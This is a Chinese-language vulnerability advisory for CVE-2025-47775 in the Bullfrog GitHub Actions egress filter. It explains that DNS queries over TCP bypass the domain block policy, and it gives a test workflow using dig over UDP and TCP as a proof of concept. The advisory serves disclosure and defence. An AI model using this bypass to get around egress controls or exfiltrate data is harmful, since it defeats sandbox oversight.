本文详细披露了Bullfrog安全工具(v0.8.4之前版本)中的一个中等严重性漏洞(CVE-2025-47775)。该漏洞允许攻击者通过TCP协议进行DNS查询,从而绕过工具配置的域名过滤策略,实现数据外泄或沙箱逃逸。
漏洞详情
包/项目
bullfrogsec/bullfrog (GitHub Actions)
受影响版本
< 0.8.4
已修复版本
0.8.4
描述
概要
使用TCP协议会破坏域名阻挡机制,并允许进行DNS数据外泄。
概念验证 (PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
name: test
on:
push:
branches:
- "*"
jobs:
testBullFrog:
runs-on: ubuntu-22.04
steps:
- name: Use google dns
run: |
sudo resolvectl dns eth0 1.1.1.1
resolvectl status
- name: Set up bullfrog to block everything
uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
with:
egress-policy: block
allowed-domains: |
*.github.com
- name: Test connectivity
run: |
echo testing udp allowed ..
dig api.github.com @1.1.1.1 || :
echo testing tcp allowed ..
dig api.github.com @1.1.1.1 +tcp || :
echo testing udp not allowed
dig api.google.com @1.1.1.1 || :
echo testing tcp not allowed
dig api.google.com @1.1.1.1 +tcp || :
|
影响
沙箱逃逸。
参考链接
安全信息
严重程度
中等
CVSS总体评分
6.2 / 10
CVSS v3 基础指标
- 攻击向量 (AV): 本地 (L)
- 攻击复杂度 (AC): 低 (L)
- 所需权限 (PR): 无 (N)
- 用户交互 (UI): 无 (N)
- 作用域 (S): 未改变 (U)
- 机密性影响 (C): 高 (H)
- 完整性影响 (I): 无 (N)
- 可用性影响 (A): 无 (N)
CVSS向量字符串: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS分数
0.051% (第16百分位)
弱点 (CWE)
- CWE-201: 将敏感信息插入发送的数据中 - 代码向另一个参与者传输数据,但部分数据包含了不应被该参与者访问的敏感信息。